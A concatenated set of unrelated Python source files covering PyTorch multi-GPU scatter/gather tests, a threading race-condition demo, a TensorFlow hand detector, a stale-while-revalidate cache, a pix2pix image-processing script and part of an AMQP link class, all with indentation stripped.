if dim in [0, -2]:
comm.gather((x, y[:, 1:]), dim=dim)
elif dim in [1, -1]:
comm.gather((x, y[1:, :]), dim=dim)
def test_gather(self):
self._test_gather(0)
def test_gather_dim(self):
self._test_gather(1)
def test_gather_neg_dim(self):
self._test_gather(-1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_format_scatter_gather(self):
nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last)
results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0)
for result in results:
self.assertFalse(result.is_contiguous())
self.assertTrue(result.is_contiguous(memory_format=torch.channels_last))
gathered = torch.cuda.comm.gather(results)
self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last))
def test_matmul_device_mismatch(self):
cpu = torch.rand((10, 10))
cuda = cpu.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cpu @ cuda
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cuda @ cpu
for s, m1, m2 in product((cpu, cuda), repeat=3):
if s.device == m1.device == m2.device:
torch.addmm(s, m1, m2)
else:
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
torch.addmm(s, m1, m2)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_scatter_namedtuple(self):
# tests ability to scatter namedtuples and retrieve a list where each
# element is of the expected namedtuple type.
fields = ("a", "b")
TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_0(a, b)
target_gpus = [torch.device(i) for i in range(num_gpus)]
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_1(a, b)
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_gather_namedtuple(self):
# tests ability to gather a list of namedtuples and return a namedtuple where each
# element is of the expected tensor type.
fields = ['a', 'b']
TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_0(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_0(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1]))) # x must be a tensor
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_1(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_1(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
if __name__ == '__main__':
run_tests()
|
11_race_condition_problem.py
|
from logging_utils import info, THREAD_FORMAT
import logging
import threading
logging.basicConfig(level=logging.DEBUG, format=THREAD_FORMAT)
BALANCE = 0
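# Why this demo races: `BALANCE += 10` is not atomic. CPython executes it as a
# load of BALANCE, an add, and a store back, and the interpreter may switch
# threads between those steps, so concurrent deposits and withdrawals can
# overwrite each other's updates and the final balance is usually not 0.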
def deposit() -> None:
global BALANCE
for _ in range(0, 1000000):
BALANCE += 10
def withdrawal() -> None:
global BALANCE
for _ in range(0, 1000000):
BALANCE -= 10
if __name__ == '__main__':
thread1 = threading.Thread(target=deposit)
thread2 = threading.Thread(target=withdrawal)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
info(f"Total balance: {BALANCE}")
|
detector_utils.py
|
# Utilities for object detector.
import sys
import cv2
import os
import numpy as np
import tensorflow as tf
from threading import Thread
from datetime import datetime
from utils import label_map_util
from collections import defaultdict
from utils import circlemanager
detection_graph = tf.Graph()
sys.path.append("..")
# score threshold for showing bounding boxes.
_score_thresh = 0.27
MODEL_NAME = 'hand_inference_graph'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt')
NUM_CLASSES = 1
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load a frozen inference graph into memory
def load_inference_graph():
# load frozen tensorflow model into memory
print("> ====== loading HAND frozen graph into memory")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.")
return detection_graph, sess
# Draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
maxSize = 0
result = None
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (255, 255, 255), 3, 1)
# Left top corner, right bottom corner
# print("Testing: " + str(left) + "," + str(top) + " " + str(right) + "," + str(bottom))
if ((right - left) * (bottom - top) > maxSize):
maxSize = (right - left) * (bottom - top)
result = ((int)((left + right)/2) ,(int)((top + bottom)/2))
return result
# Show fps value on image.
def draw_fps_on_image(fps, image_np):
pass  # fps overlay currently disabled; uncomment the cv2.putText call below to draw it
#cv2.putText(image_np, fps, (20, 50),
#cv2.FONT_HERSHEY_SIMPLEX, 0.75, (255, 255, 255), 2)
# Practice line
def draw_base_lines_on_image(x, y, image_np):
# Horizontal line
color = (255, 255, 255)
initialX = (int)(x / 4)
thirdOfY = (int)(2 * y / 3)
cv2.line(image_np, (0, thirdOfY), (x, thirdOfY), color, 3)
# Vertical lines
cv2.line(image_np, (initialX, thirdOfY), (initialX, y), color, 3)
cv2.line(image_np, (initialX * 2, thirdOfY), (initialX * 2, y), color, 3)
cv2.line(image_np, (initialX * 3, thirdOfY), (initialX * 3, y), color, 3)
# Actual detection .. generate scores and bounding boxes given an image
def detect_objects(image_np, detection_graph, sess):
# Define input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
# Each score represents the level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
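# --- Usage sketch (not part of the original module) ---
# A minimal example of how the pieces above are typically wired together. The
# webcam index (0), the 320x180 capture size and the BGR->RGB conversion are
# assumptions for illustration, not requirements of this module.
if __name__ == '__main__':
    detection_graph, sess = load_inference_graph()
    stream = WebcamVideoStream(src=0, width=320, height=180).start()
    im_width, im_height = stream.size()
    try:
        while True:
            frame = stream.read()
            if frame is None:
                continue
            rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
            boxes, scores = detect_objects(rgb, detection_graph, sess)
            # draw up to 2 hands; returns the centre of the largest box (or None)
            centre = draw_box_on_image(2, _score_thresh, scores, boxes, im_width, im_height, rgb)
            if centre is not None:
                cv2.circle(rgb, centre, 5, (0, 255, 0), -1)
            cv2.imshow('detection', cv2.cvtColor(rgb, cv2.COLOR_RGB2BGR))
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
    finally:
        stream.stop()
        cv2.destroyAllWindows()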
|
swr_cached.py
|
from threading import Thread
from typing import Any, Optional
from .base import Api
from .cached import CachedApi
class SwrCachedApi(CachedApi):
"""SWR Cached API - Wraps an API to provide stale-while-revalidate caching.
Caches the response for `cache_time_in_seconds` seconds, after which
subsequent calls to `fetch_latest` will kick off a refresh in the background
but will return the stale cached value without blocking.
Parameters
----------
api : Api
The wrapped API
cache_time_in_seconds: int
The number of seconds to cache the response
"""
def __init__(self, api: Api, cache_time_in_seconds: int) -> None:
super().__init__(api, cache_time_in_seconds)
self.thread = None # type: Optional[Thread]
def fetch_latest(self) -> Any:
if not self.cached_response:
self.refresh()
elif self.is_stale() and not self.is_refreshing():
self.start_background_refresh()
return self.cached_response
def is_refreshing(self) -> bool:
if self.thread:
return self.thread.is_alive()
return False
def start_background_refresh(self) -> None:
self.thread = Thread(target=self.refresh)
self.thread.start()
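# --- Usage sketch (not part of the original module) ---
# Illustrates the intended stale-while-revalidate behaviour. `WeatherApi` and
# `expensive_http_call` are hypothetical; only the SwrCachedApi wrapper itself
# comes from this module.
#
#     class WeatherApi(Api):
#         def fetch_latest(self):
#             return expensive_http_call()          # slow upstream request
#
#     api = SwrCachedApi(WeatherApi(), cache_time_in_seconds=60)
#     api.fetch_latest()   # first call: blocking refresh, response is cached
#     api.fetch_latest()   # within 60s: served straight from the cache
#     # After 60s a call returns the stale value immediately and kicks off a
#     # background refresh; later calls then see the fresh response.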
|
process.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import tempfile
import subprocess
import tensorflow as tf
import numpy as np
import tfimage as im
import threading
import time
import multiprocessing
edge_pool = None
parser = argparse.ArgumentParser()
parser.add_argument("--input_dir", required=True, help="path to folder containing images")
parser.add_argument("--output_dir", required=True, help="output path")
parser.add_argument("--operation", required=True, choices=["grayscale", "resize", "blank", "combine", "edges"])
parser.add_argument("--workers", type=int, default=1, help="number of workers")
# resize
parser.add_argument("--pad", action="store_true", help="pad instead of crop for resize operation")
parser.add_argument("--size", type=int, default=256, help="size to use for resize operation")
# combine
parser.add_argument("--b_dir", type=str, help="path to folder containing B images for combine operation")
a = parser.parse_args()
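# Example invocations (directory names are placeholders):
#   python process.py --input_dir photos --output_dir out_resized --operation resize --size 256 --pad
#   python process.py --input_dir a_images --b_dir b_images --output_dir combined --operation combine
#   python process.py --input_dir photos --output_dir out_edges --operation edges --workers 4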
def resize(src):
height, width, _ = src.shape
dst = src
if height != width:
if a.pad:
size = max(height, width)
# pad to correct ratio
oh = (size - height) // 2
ow = (size - width) // 2
dst = im.pad(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
else:
# crop to correct ratio
size = min(height, width)
oh = (height - size) // 2
ow = (width - size) // 2
dst = im.crop(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
assert(dst.shape[0] == dst.shape[1])
size, _, _ = dst.shape
if size > a.size:
dst = im.downscale(images=dst, size=[a.size, a.size])
elif size < a.size:
dst = im.upscale(images=dst, size=[a.size, a.size])
return dst
def blank(src):
height, width, _ = src.shape
if height != width:
raise Exception("non-square image")
image_size = width
size = int(image_size * 0.3)
offset = int(image_size / 2 - size / 2)
dst = src
dst[offset:offset + size,offset:offset + size,:] = np.ones([size, size, 3])
return dst
def combine(src, src_path):
if a.b_dir is None:
raise Exception("missing b_dir")
# find corresponding file in b_dir, could have a different extension
basename, _ = os.path.splitext(os.path.basename(src_path))
for ext in [".png", ".jpg"]:
sibling_path = os.path.join(a.b_dir, basename + ext)
if os.path.exists(sibling_path):
sibling = im.load(sibling_path)
break
else:
raise Exception("could not find sibling image for " + src_path)
# make sure that dimensions are correct
height, width, _ = src.shape
if height != sibling.shape[0] or width != sibling.shape[1]:
raise Exception("differing sizes")
# convert both images to RGB if necessary
if src.shape[2] == 1:
src = im.grayscale_to_rgb(images=src)
if sibling.shape[2] == 1:
sibling = im.grayscale_to_rgb(images=sibling)
# remove alpha channel
if src.shape[2] == 4:
src = src[:,:,:3]
if sibling.shape[2] == 4:
sibling = sibling[:,:,:3]
return np.concatenate([src, sibling], axis=1)
def grayscale(src):
return im.grayscale_to_rgb(images=im.rgb_to_grayscale(images=src))
net = None
def run_caffe(src):
# lazy load caffe and create net
global net
if net is None:
# don't require caffe unless we are doing edge detection
os.environ["GLOG_minloglevel"] = "2" # disable logging from caffe
import caffe
# using this requires using the docker image or assembling a bunch of dependencies
# and then changing these hardcoded paths
net = caffe.Net("/opt/caffe/examples/hed/deploy.prototxt", "/opt/caffe/hed_pretrained_bsds.caffemodel", caffe.TEST)
net.blobs["data"].reshape(1, *src.shape)
net.blobs["data"].data[...] = src
net.forward()
return net.blobs["sigmoid-fuse"].data[0][0,:,:]
def edges(src):
# based on https://github.com/phillipi/pix2pix/blob/master/scripts/edges/batch_hed.py
# and https://github.com/phillipi/pix2pix/blob/master/scripts/edges/PostprocessHED.m
import scipy.io
src = src * 255
border = 128 # put a padding around images since edge detection seems to detect edge of image
src = src[:,:,:3] # remove alpha channel if present
src = np.pad(src, ((border, border), (border, border), (0,0)), "reflect")
src = src[:,:,::-1]
src -= np.array((104.00698793,116.66876762,122.67891434))
src = src.transpose((2, 0, 1))
# [height, width, channels] => [batch, channel, height, width]
fuse = edge_pool.apply(run_caffe, [src])
fuse = fuse[border:-border, border:-border]
with tempfile.NamedTemporaryFile(suffix=".png") as png_file, tempfile.NamedTemporaryFile(suffix=".mat") as mat_file:
scipy.io.savemat(mat_file.name, {"input": fuse})
octave_code = r"""
E = 1-load(input_path).input;
E = imresize(E, [image_width,image_width]);
E = 1 - E;
E = single(E);
[Ox, Oy] = gradient(convTri(E, 4), 1);
[Oxx, ~] = gradient(Ox, 1);
[Oxy, Oyy] = gradient(Oy, 1);
O = mod(atan(Oyy .* sign(-Oxy) ./ (Oxx + 1e-5)), pi);
E = edgesNmsMex(E, O, 1, 5, 1.01, 1);
E = double(E >= max(eps, threshold));
E = bwmorph(E, 'thin', inf);
E = bwareaopen(E, small_edge);
E = 1 - E;
E = uint8(E * 255);
imwrite(E, output_path);
"""
config = dict(
input_path="'%s'" % mat_file.name,
output_path="'%s'" % png_file.name,
image_width=256,
threshold=25.0/255.0,
small_edge=5,
)
args = ["octave"]
for k, v in config.items():
args.extend(["--eval", "%s=%s;" % (k, v)])
args.extend(["--eval", octave_code])
try:
subprocess.check_output(args, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
print("octave failed")
print("returncode:", e.returncode)
print("output:", e.output)
raise
return im.load(png_file.name)
def process(src_path, dst_path):
src = im.load(src_path)
if a.operation == "grayscale":
dst = grayscale(src)
elif a.operation == "resize":
dst = resize(src)
elif a.operation == "blank":
dst = blank(src)
elif a.operation == "combine":
dst = combine(src, src_path)
elif a.operation == "edges":
dst = edges(src)
else:
raise Exception("invalid operation")
im.save(dst, dst_path)
complete_lock = threading.Lock()
start = None
num_complete = 0
total = 0
def complete():
global num_complete, rate, last_complete
with complete_lock:
num_complete += 1
now = time.time()
elapsed = now - start
rate = num_complete / elapsed
if rate > 0:
remaining = (total - num_complete) / rate
else:
remaining = 0
print("%d/%d complete %0.2f images/sec %dm%ds elapsed %dm%ds remaining" % (num_complete, total, rate, elapsed // 60, elapsed % 60, remaining // 60, remaining % 60))
last_complete = now
def main_progress():
if not os.path.exists(a.output_dir):
os.makedirs(a.output_dir)
src_paths = []
dst_paths = []
skipped = 0
for src_path in im.find(a.input_dir):
name, _ = os.path.splitext(os.path.basename(src_path))
dst_path = os.path.join(a.output_dir, name + ".png")
if os.path.exists(dst_path):
skipped += 1
else:
src_paths.append(src_path)
dst_paths.append(dst_path)
print("skipping %d files that already exist" % skipped)
global total
total = len(src_paths)
print("processing %d files" % total)
global start
start = time.time()
if a.operation == "edges":
# use a multiprocessing pool for this operation so it can use multiple CPUs
# create the pool before we launch processing threads
global edge_pool
edge_pool = multiprocessing.Pool(a.workers)
if a.workers == 1:
with tf.Session() as sess:
for src_path, dst_path in zip(src_paths, dst_paths):
process(src_path, dst_path)
complete()
else:
queue = tf.train.input_producer(zip(src_paths, dst_paths), shuffle=False, num_epochs=1)
dequeue_op = queue.dequeue()
def worker(coord):
with sess.as_default():
while not coord.should_stop():
try:
src_path, dst_path = sess.run(dequeue_op)
except tf.errors.OutOfRangeError:
coord.request_stop()
break
process(src_path, dst_path)
complete()
# init epoch counter for the queue
local_init_op = tf.local_variables_initializer()
with tf.Session() as sess:
sess.run(local_init_op)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
for i in range(a.workers):
t = threading.Thread(target=worker, args=(coord,))
t.start()
threads.append(t)
try:
coord.join(threads)
except KeyboardInterrupt:
coord.request_stop()
coord.join(threads)
def main():
t = threading.Thread(target=main_progress, name="main_p")
t.start()
main()
|
AmqpLink.py
|
# Copyright (c) 2019 Iotic Labs Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://github.com/Iotic-Labs/py-IoticAgent/blob/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import logging
logger = logging.getLogger(__name__)
from sys import version_info, exc_info
try:
BlockingIOError
except NameError:
# Python < 2.7.9 & < 3.4
from io import BlockingIOError # pylint: disable=redefined-builtin
from ssl import SSLError
from threading import Thread
from socket import timeout as SocketTimeout
from ..third.amqp import Connection, Message, exceptions
from .Profiler import profiled_thread
from .compat import raise_from, Event, RLock, monotonic, SocketError
from .utils import EventWithChangeTimes, validate_nonnegative_int
from .Exceptions import LinkException
DEBUG_ENABLED = logger.isEnabledFor(logging.DEBUG)
class AmqpLink(object): # pylint: disable=too-many-instance-attributes
"""Helper class to deal with AMQP connection.
"""
def __init__(self, host, vhost, prefix, epid, passwd, msg_callback, ka_callback, # pylint: disable=too-many-locals
send_ready_callback, sslca=None, prefetch=128, ackpc=0.5, heartbeat=30, socket_timeout=10,
startup_ignore_exc=False, conn_retry_delay=5, conn_error_log_threshold=180):
"""
`host`: Broker 'host:port'
`vhost`: Virtualhost name
`prefix`: username prefix for amqp login
`epid`: entity process ID
`passwd`: password
`msg_callback`: function callback for messages. Arguments: message
`ka_callback`: function callback for keepalives, Arguments: none
`send_ready_callback`: callback on send thread readiness. Arguments: last disconnection time
`sslca`: Server Certificate
`prefetch`: max number of messages to get on amqp connection drain
`ackpc`: maximum fraction (0..1) of `prefetch` of unacknowledged messages
`heartbeat`: How often (in seconds) to send AMQP heartbeat
`socket_timeout`: Timeout of underlying sockets both for connection and subsequent operations
`startup_ignore_exc`: On startup only, whether to ignore exceptions until socket_timeout has elapsed. This means
that e.g. an access-refused will result in a retry on startup (assuming `socket_timeout`
seconds haven't elapsed yet) rather than immediately failing.
`conn_retry_delay`: How long (in seconds) to wait in between re-connection attempts when the connection to the
broker is lost
`conn_error_log_threshold`: How long (in seconds) to delay logging connection failures at ERROR level. Until said
threshold is reached, the error messages will be logged at WARNING level.
"""
self.__host = host
self.__vhost = vhost
self.__prefix = prefix
self.__epid = epid
self.__passwd = passwd
#
self.__msg_callback = msg_callback
self.__ka_callback = ka_callback
self.__send_ready_callback = send_ready_callback
#
self.__sslca = sslca
self.__prefetch = prefetch
self.__ackpc = ackpc
self.__ack_threshold = self.__prefetch * self.__ackpc
self.__heartbeat = heartbeat
self.__socket_timeout = validate_nonnegative_int(socket_timeout, 'socket_timeout', allow_zero=False)
#
self.__unacked = 0
self.__last_id = None
#
self.__end = Event()
self.__recv_ready = EventWithChangeTimes()
self.__recv_thread = None
self.__send_ready = EventWithChangeTimes()
self.__send_lock = RLock()
self.__send_channel = None
self.__ka_channel = None
self.__send_thread = None
self.__send_exc_time = None
self.__send_exc = None # Used to pass exceptions to blocking calls EG .start
self.__recv_exc = None
# Whether to only rely on timeout on startup
self.__startup_ignore_exc = bool(startup_ignore_exc)
self.__conn_retry_delay = validate_nonnegative_int(conn_retry_delay, 'conn_retry_delay', allow_zero=False)
self.__conn_error_log_threshold = validate_nonnegative_int(conn_error_log_threshold, 'conn_error_log_threshold',
allow_zero=False)
def start(self):
"""start connection threads, blocks until started
"""
if not (self.__recv_thread or self.__send_thread):
self.__end.clear()
self.__send_ready.clear()
self.__recv_ready.clear()
timeout = self.__socket_timeout + 1
ignore_exc = self.__startup_ignore_exc
self.__send_exc_clear()
self.__recv_exc_clear()
# start & await send thread success (unless timeout reached or an exception has occurred)
self.__send_thread = Thread(target=self.__send_run, name='amqplink_send')
self.__send_thread.start()
start_time = monotonic()
success = False
while not (success or (not ignore_exc and self.__send_exc) or monotonic() - start_time > timeout):
success = self.__send_ready.wait(.25)
if success:
# start & await receiver thread success
self.__recv_thread = Thread(target=self.__recv_run, name='amqplink_recv')
self.__recv_thread.start()
start_time = monotonic()
success = False
while not (success or (not ignore_exc and self.__recv_exc) or monotonic() - start_time >= timeout):
success = self.__recv_ready.wait(.25)
# handle either thread's failure
if not success:
logger.warning("AmqpLink Failed to start. Giving up.")
self.stop()
if self.__recv_exc:
# prioritise receive thread since this can get access-denied whereas send does not (until sending)
raise_from(LinkException('Receive thread failure'), self.__recv_exc)
elif self.__send_exc:
raise_from(LinkException('Send thread failure'), self.__send_exc)
else:
raise LinkException('Unknown link failure (timeout reached)')
else:
raise LinkException('amqplink already started')
def is_alive(self):
"""Helper function to show if send & recv Threads are running
"""
if self.__send_ready.is_set() and self.__recv_ready.is_set():
if self.__send_thread is not None and self.__recv_thread is not None:
return self.__send_thread.is_alive() and self.__recv_thread.is_alive()
return False
def stop(self):
"""disconnect, blocks until stopped
"""
self.__end.set()
if self.__recv_thread:
self.__recv_thread.join()
self.__recv_thread = None
if self.__send_thread:
self.__send_thread.join()
self.__send_thread = None
@property
def last_send_exc_time(self):
"""Timestamp (or None) at which send thread last failed
"""
return self.__send_exc_time
def __del__(self):
self.stop()
def send(self, body, content_type='application/ubjson', timeout=5):
"""timeout indicates amount of time to wait for sending thread to be ready. set to larger than zero to wait
(in seconds, fractional) or None to block.
"""
if self.__send_ready.wait(timeout):
try:
with self.__send_lock:
# an access-denied response might be received inside the send thread rather than here; how best to handle?
self.__send_channel.basic_publish(msg=Message(body, delivery_mode=2, content_type=content_type),
exchange=self.__epid)
except exceptions.AccessRefused as exc:
raise_from(LinkException('Access denied'), exc)
except (exceptions.AMQPError, SocketError) as exc:
raise_from(LinkException('amqp/transport failure'), exc)
except Exception as exc: # pylint: disable=broad-except
raise_from(LinkException('unexpected failure'), exc)
else:
exc = self.__send_exc
if exc:
raise_from(LinkException('Sender unavailable'), exc)
else:
raise LinkException('Sender unavailable (unknown error)')
@classmethod
def __get_ssl_context(cls, sslca=None):
"""Make an SSLConext for this Python version using public or sslca
"""
if ((version_info[0] == 2 and (version_info[1] >= 7 and version_info[2] >= 5)) or
(version_info[0] == 3 and version_info[1] >= 4)):
logger.debug('SSL method for 2.7.5+ / 3.4+')
# pylint: disable=no-name-in-module,import-outside-toplevel
from ssl import SSLContext, PROTOCOL_TLSv1_2, CERT_REQUIRED, OP_NO_COMPRESSION
ctx = SSLContext(PROTOCOL_TLSv1_2)
ctx.set_ciphers('HIGH:!SSLv3:!TLSv1:!aNULL:@STRENGTH')
# see CRIME security exploit
ctx.options |= OP_NO_COMPRESSION
# the following options are used to verify the identity of the broker
if sslca:
ctx.load_verify_locations(sslca)
ctx.verify_mode = CERT_REQUIRED
ctx.check_hostname = False
else:
# Verify public certificates if sslca is None (default)
from ssl import Purpose # pylint: disable=no-name-in-module,import-outside-toplevel
ctx.load_default_certs(purpose=Purpose.SERVER_AUTH)
ctx.verify_mode = CERT_REQUIRED
ctx.check_hostname = True
elif version_info[0] == 3 and version_info[1] < 4:
logger.debug('Using SSL method for 3.2+, < 3.4')
# pylint: disable=no-name-in-module,import-outside-toplevel
from ssl import SSLContext, CERT_REQUIRED, PROTOCOL_SSLv23, OP_NO_SSLv2, OP_NO_SSLv3, OP_NO_TLSv1
ctx = SSLContext(PROTOCOL_SSLv23)
ctx.options |= (OP_NO_SSLv2 | OP_NO_SSLv3 | OP_NO_TLSv1)
ctx.set_ciphers('HIGH:!SSLv3:!TLSv1:!aNULL:@STRENGTH')
# the following options are used to verify the identity of the broker
if sslca:
ctx.load_verify_locations(sslca)
ctx.verify_mode = CERT_REQUIRED
else:
# Verify public certificates if sslca is None (default)
ctx.set_default_verify_paths()
ctx.verify_mode = CERT_REQUIRED
else:
raise Exception("Unsupported Python version %s" % '.'.join(str(item) for item in version_info[:3]))
return ctx
def __recv_ka_cb(self, msg):
try:
if self.__recv_ready.wait(2):
self.__ka_channel.basic_publish(msg=Message(b'', delivery_mode=1), routing_key='keep-alive',
exchange=self.__epid)
else:
logger.warning('Recv thread not ready in 2 seconds, not sending KA response')
except:
logger.warning('Failed to send KA response')
try:
self.__ka_callback()
except:
logger.exception("__recv_ka_cb exception ignored.")
def __recv_cb(self, msg):
"""Calls user-provided callback and marks message for Ack regardless of success
"""
try:
self.__msg_callback(msg)
except:
logger.exception("AmqpLink.__recv_cb exception calling msg_callback")
finally:
# only works if all messages handled in series
self.__last_id = msg.delivery_tag
self.__unacked += 1
@profiled_thread # noqa (complexity)
def __recv_run(self): # pylint: disable=too-many-branches,too-many-statements
"""Main receive thread/loop
"""
while not self.__end.is_set():
self.__unacked = 0
self.__last_id = None
try:
self.__recv_ready.clear() # Ensure event is cleared for EG network failure/retry loop
with Connection(userid=self.__prefix + self.__epid,
password=self.__passwd,
virtual_host=self.__vhost,
heartbeat=self.__heartbeat,
connect_timeout=self.__socket_timeout,
operation_timeout=self.__socket_timeout,
ssl=self.__get_ssl_context(self.__sslca),
host=self.__host) as conn,\
conn.channel(auto_encode_decode=False) as channel_data,\
conn.channel() as channel_ka:
logger.debug('Connected, using cipher %s', conn.transport.sock.cipher()[0])
channel_data.basic_qos(prefetch_size=0, prefetch_count=self.__prefetch, a_global=False)
# exclusive=True. There can be only one (receiver)
msgtag = channel_data.basic_consume(queue=self.__epid, exclusive=True, callback=self.__recv_cb)
acktag = channel_ka.basic_consume(queue=('%s_ka' % self.__epid), exclusive=True, no_ack=True,
callback=self.__recv_ka_cb)
self.__ka_channel = channel_ka
self.__recv_exc_clear(log_if_exc_set='reconnected')
self.__recv_ready.set()
try:
#
# Drain loop
while not self.__end.is_set():
try:
while not self.__end.is_set() and self.__unacked < self.__ack_threshold:
# inner loop to handle all outstanding amqp messages
conn.drain_events(.1)
except SocketTimeout:
pass
